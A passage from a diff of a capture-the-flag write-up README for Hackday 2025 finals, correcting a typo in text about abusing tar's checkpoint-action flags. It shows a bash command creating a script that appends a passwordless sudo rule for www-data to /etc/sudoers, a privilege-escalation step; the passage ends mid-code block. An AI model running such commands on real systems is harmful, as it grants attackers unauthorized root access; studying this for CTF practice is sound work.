Ax8457/WriteUPs/Hackday2025_finals/TheHearthOfGearford/README.md

             Run ACTION on each checkpoint.
 ````

 <p align="justify">Here, the previous tar flags mentioned before revealed useful insofar as their permitted to define a script to run with tar.
-The following commands could have been run to execute the attack and get an foothold in sudoers users : </p>
+The following commands could have been run to execute the attack and get a foothold in sudoers users : </p>

 ````bash
 echo "echo 'www-data  ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers" > /home/user/evil.sh